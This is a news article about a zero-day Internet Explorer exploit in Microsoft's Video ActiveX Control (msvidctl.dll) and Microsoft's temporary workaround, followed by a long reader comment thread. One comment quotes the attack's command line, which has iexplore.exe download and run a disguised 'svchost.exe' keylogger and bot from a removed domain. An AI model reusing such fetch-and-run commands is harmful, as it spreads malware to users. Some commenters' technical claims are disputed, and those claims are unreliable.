Microsoft warns of serious IE exploit discovery

A very critical security vulnerability has been discovered without a fix for it yet. The exploit can hijack a computer remotely if the victim simply visits a compromised web site. The attack allows hackers to exploit a hole into the victims computer through Microsoft's Video ActiveX Control.

The "zero day" vulnerability affects only Internet Explorer users via compromised web sites through part of its software used to play videos. The exploit can only attack users running Windows XP and Windows Server 2003 using the msvidctl.dll file that hosts this ActiveX Control. Microsoft recommends removing support for this ActiveX Control within Internet Explorer.

A patch for the exploit could take months to ready, so for now a temporary work around has been posted on Microsoft's support web site under the "Fix it" feature. Users can enable or disable the work around through Microsoft's web site.

Microsoft warns Windows XP and Windows Server 2003 users to enable the temporary workaround for now and also advises Windows Vista and Windows Server 2008 users to take these steps as a precaution. Internet Explorer 6 and 7 users are at risk but not Internet Explorer 8 users.

Report a problem with article
Previous Story

Carbon ring storage aims for 1,000 times denser memory

Next Story

LG set to launch 'Watch Phone' in the UK this August

98 Comments

Commenting is disabled on this article.

Thanks to the writer for the 'heads up' but as usual a thread like this gets infested by some immature participants who turn it into a 'my browser is better than yours' thread or 'I hate IE' thread. Do some of you guys actually compare your dick with that of your neighbours? Jeez, some people need to get out more........

But here's what rubs me wrong. MS quote from the ZDnet article "Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer."

Therefore, if there are NO "by-design uses" why in the world did they leave that ActiveX Control active all this time? They have had YEARS to disable unused ActiveX controls! Now maybe I'm totally in left field, but doesn't MS control the valid Active X controls?

How many other Active X Controls with no "by-design uses" are still active and therefore ready to be the next zero-day news story?

It used to have uses, but it was deprecated. XP and earlier systems would still have it enabled because it was already there and enabled from before it fell out of use.

bbfc_uk said,
Anyone using IE6 really does need shooting, its the swiss cheese of browsers. IE8 is the way forward...

Some people don't have a choice, particularly if it's a corporate PC... Shooting people for running IE6 because that is what is on their work pc and they often are unable to install anything else isn't nice


At where I use to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."

UncleSpellbinder said,
At where I use to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."


That's special right there

lordcanti86 said,
That's special right there

I thought that was pretty special myself. I wonder how a company that size (and it's a mid-size company with 4 plants in the U.S.) can operate with an IT department that obviously have no clue at all.

UncleSpellbinder said,
At where I use to work, they still have XP SP1, IE 6. They won't upgrade further because their IT department says that "any Windows OS beyond XP SP1 is not a safe environment to operate any size business."

Wow, at least they are honest... and could do with a lot more IT departments deciding being this honest. Of course the real reason is more likely that they can't afford moving to anything, what with all the testing and rewriting applications they would have to do, since not even ie7 is compatible with ie6. What a joke.

cakesy said,
Wow, at least they are honest... and could do with a lot more IT departments deciding being this honest. Of course the real reason is more likely that they can't afford moving to anything, what with all the testing and rewriting applications they would have to do, since not even ie7 is compatible with ie6. What a joke.


And that, my friend, is what's really going to hold the internet back. Companies either unwilling or unable to rewrite their web apps for something that's not IE6.

it's a conspiracy to force people to upgrade!

they is teh ebil!

why did they have to conveniently discover a vulnerability now?

I guess we are all safe. I've tried visiting the domains with the infection but they all time out. I think only noobs would get infected as you somehow have to run a file that downloads?

Code spawn a shell with the following call, where to download and run malicious code:
C:\[% programfiles%]\Internet Explorer\iexplore.exe "http://<domain removed>/wm/svchost.exe

The goal of this attack is to run the file "svchost.exe" on vulnerable systems. The file is a Keylogger to record all keystrokes on your machine and also binds the machine into a C & C / BOT networks. The code retrieves several accompanying components installing a cocktail of malicious code on the compromised system

cakesy said,
Yeah, thank god nobody would ever use this on another domain, because that is the law!

If you had bothered to read up on this you would know that all the infected websites redirect traffic to one domain.

Lepton said,
If you had bothered to read up on this you would know that all the infected websites redirect traffic to one domain.

So can you please explain how this can never be used again? How hard is it to setup another domain?? Let me tell you, not very hard.

I am not sure what you are saying, are you saying that we don't have to worry about this anymore?

ThePitt said,
interesting that microsoft is the one who warns about that...


Well, you'll probably be warned by Apple in the next Mac vs PC commercial.

it is proven to be an exploit on XP and server 2003 using IE6 and IE7. microsoft does warn that vista and server 2008 users should take precaution.

Better safe than sorry

The BoF vulnerability is in the MSVidCtl.dll (be it under XP or Vista or even 7). But it all comes down to the exploit. Writing a working exploit for a BoF that can circumvent ASLR+DEP is extremely difficult if not impossible in some cases (ASLR/DEP was only introduced in WinVista and later).

meriam said,
The BoF vulnerability is in the MSVidCtl.dll (be it under XP or Vista or even 7). But it all comes down to the exploit. Writing a working exploit for a BoF that can circumvent ASLR+DEP is extremely difficult if not impossible in some cases (ASLR/DEP was only introduced in WinVista and later).


Not only do you have ASLR/DEP, but IE runs in protected mode in Vista and Win7. This means that even if you are exposed to any unknown type of malware, it can't do anything to the computer. Think of protected mode as teflon or a nice sandbox...

darkmanx21 said,
So this is not for IE8 on Vista or 7? I think anyone using IE6 deserves to be hacked, lol.

+1. I don't know why anyone would continue to use IE6.

I got this earlier, from netscape so it isn't only an IE flaw.
<3 Application Protection, teminated the exe and deleted it... Looked at it a bit in notepad, it's got registry functions, along with the generic clipboard, internet, etc. so looks like trojans are being put on large video sites already

No offense, but it's time for you to get a real browser, bud. Using old outdated software can be very bad, especially for anyone you come into contact with on a day to day basis.

You've got plenty of choices these days too.

Well aside from my laptop which is using netscape 9 beta, on my other PC's I've got firefox 1.5, people bitch saying I should upgrade but no, I prefer the look and feel of 1.5 even though it memory leaks constantly. Closing tabs is done with the button on the right, not one on each of the tabs, and I prefer it this way!

n_K said,
Well aside from my laptop which is using netscape 9 beta, on my other PC's I've got firefox 1.5, people bitch saying I should upgrade but no, I prefer the look and feel of 1.5 even though it memory leaks constantly. Closing tabs is done with the button on the right, not one on each of the tabs, and I prefer it this way!

Move the close button to the right with about:config and set browser.tabs.closebuttons to 3

I found that in the first result of my first Google search. If there are other things you don't like about newer versions of Firefox I'm sure you can fix those too.

Dr_Asik said,
IE8 on Vista SP2 here - phew! Keeping up-to-date = maximum security. :)

Not using IE = maximum security + peace of mind

dafin0 said,
this is why people shouldn't be uses a 3 and 8 year old internet browsers

Usually for Corporate policies but also for computer that runs fine and for customers that are pretty afraid to do some complex job (such updating their pc"

The constant evolution (and involution) of the computer system must stop at some point, it is chaotic to think to switch products almost every 3 years.

DClark said,
IE8 + Windows 7 = Goodness

Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.

:facepalm:

IE 6/7 are affected on windows XP/Server 2003. Fix=Update your ****.

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.



I guess other browsers don't get security vulnerabilities either eh? What twisted world do you live in?

cakesy said,
Anybody still using IE after all the problems, security vulnerabilities, is just asking for trouble. I can understand when we only had netscape, but there are so many superior browsers out there, this entire episode is a joke.


1) Yes

2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...

thenetavenger said,
1) Yes

2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...


Im aware of this, but I prefer Firefox because of addons like Firegestures (Or Opera) and adblock. Jus sayin or else Id be on IE8.

thenetavenger said,
1) Yes

2) IE7 and IE8 have had less vulnerbilities than Firefox or Safari, or Chrome

3) The exploit is in the OS level ActiveX Control, not the BROWSERS

4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

* IE in Vista or Win7 they run in 'protected mode' that runs in a low security mode sandbox. This is why when new web based vulnerbilities come around, they won't affect Vista or Win7 if you are running IE.

---

So if you have Vista or Win7 and ARE NOT running IE, you are either misinformed, or like exposing yourself to extra risks out of stupidity...

Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.

thenetavenger said,
4) IE7 or IE8 on Vista or Win7 are the most secure way to browse the internet.

+1

The problem with Firefox is that you only need to get arbitrary code running in the browser process and it's game over.

cakesy said,

Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.

Windows 7 is built on Windows NT, or an I missing something here?

DClark said,
IE8 + Windows 7 = Goodness

u mean ff 3.5 + win7=holyness

When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated

Ridlas said,
u mean ff 3.5 + win7=holyness

When i use IE8 on my core 2 duo with 4GB ram running windows 7 x64 it lags so bad that i get frustrated

I agree. The lag is utterly ridiculous. Something as simple as opening a new (Empty) tab takes forever... :-

bbfc_uk said,
Windows 7 is built on Windows NT, or an I missing something here?

Nope. You're not missing anything. He's just horribly misinformed.

cakesy said,
Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.

It's called Protected Mode. Might wanna get your facts straight there, smart guy.

bbfc_uk said,
Windows 7 is built on Windows NT, or an I missing something here?


Nope.

We might as well take his suggestion all the way and claim Windows 7 x64 still has MS-DOS sitting at the bottom somewhere.

bbfc_uk said,
Windows 7 is built on Windows NT, or an I missing something here?

It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.

Big wow. An OS with bugs in it with various GUI similarities between versions, and a COMMERCIAL company trying to save money by recycling code. Who'da thought it.

/sarcasm

And all that's going to change as they're meant to be starting from (pretty much) scratch with Midori due for release after Windows 8 IIRC.

Yes, they will eventually ditch Windows for this managed-code based OS (and yes, I'm dubious about how well it will perform because of this).

cakesy said,


Ha ha ha, funny stuff. There is no way that ie7 and ie8 are less vulnerable than almost any browser out there. You are clearly making stuff up, or why don't you show some actual studies to prove this point, with actual points we can refute. I would trust anything, even something made by real networks over ie. Sure, ie8 is not a bad browser, and it is good to see that MS are at least trying to catch up to the competition.

Maybe you forget who introduced the complete travesty that is ActiveX onto us?

4) - complete and utter load of ********. If you believe this then your a danger to you, and anyone you advise. I hope you don't actually work in IT for a living. Win 7 is a move in the right direction, but since it hasn't even been released yet we have no way to be sure how safe it is. The problem MS has is that they are building there OS on top of an OS that has NO security built into it all, Win 3.1.


Wow, both of these posts are written by people who would rather argue than be honest. Over the last 2 years IE has had about the same number of vulnerabilities and patches as other popular browsers. Yes, there are studies if you don't want to take my word for it but Google them yourself, I am not going to spoon feed anyone. To this point number 4, wow, I hope that person doesn't actually do any IT work either. Windows NT has always been built around a secure execution model similar to UNIX. The Windows 9x system (which shares some roots from 3.1) was not. The last version of Windows 9x was ME. Starting with Windows 2000 (which was primarily marketed as a business OS) home users had an operating system available based on the NT code base, XP put it out there to the masses.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.


Dude!! You are so clueless I'm not sure I should even reply. Windows NT was build from the ground up by a joint effort between MS and IBM (IBM pulled out before the project was finished and used their work on the project to build their own OS2, then the two sued each other for stealing the other̢۪s work from the failed collaboration, but that is a side story). Yes, the GUI was the same, the goal of Windows NT was to build a stable and secure OS, not redesign the user interface. So yes, they used a lot of the same helper apps (program manager, file manager, in later versions explorer.exe) but the way the system works under the covers is 100% different. It doesn̢۪t take much digging around to see this first hand.

To the point about the image vulnerability, that has nothing to do with the OS...but it sounds like you do not understand the difference between an operating system and an application so you might not be able to follow. MS had a common code library for working with JPG images, that library was used by any MS app that needed JPG support. When a vulnerability was found, yes, it effected everything that used that code library including pictures viewer applications from both OS (but not the core OS its self) and a whole slew of other MS applications. Not that you will understand this, but that was a user level vulnerability, not a kernel or system level, it had nothing to do with the operating system.

From a simple point of view, yes, clearly everything that comes on the install media could be considered part of the OS and from that point of view, yes, there still are some included applications that use the same code as those included with Windows 3.1 or 95 (calc, paint, backup, wordpad, Outlook Express and even Internet Explorer are a few that come to mind), but none of these applications have anything to do with OS security in the manner you are implying.

cakesy said,
It is win3.1 all the way down, baby.

You do know that NT didn't come out of thin air, sure it was a big redesign of the code, but a lot of the elements of 3.1 are in NT. Or did you think it was a huge coincidence that THEY LOOKED EXACTLY THE SAME. (3.1 and nt 3.5)

And along with this, notice that both OS were vulnerable with the image bug, that came up last year. You probably won't remember it,... there has been a couple of windows bugs, not that anyone on here would admit to it.

So there are parts of 3.1 still in Vista, how much WE WILL NEVER KNOW, since Microsoft don't release the source code... Well, plenty of us do know, people who really look into this stuff, but most tech people won't. But then again, most people are just happy accepting anything that MS give them.


No, NT is a brand new kernel. It doesn't contain parts of 3.1. Just because they use similar resource files for the UI bits doesn't imply at all that the kernel is built on it. Heck, NT isn't even 16 bit like Windows 3.1 was. Additionally, Windows 3.1 was built on DOS, which NT wasn't.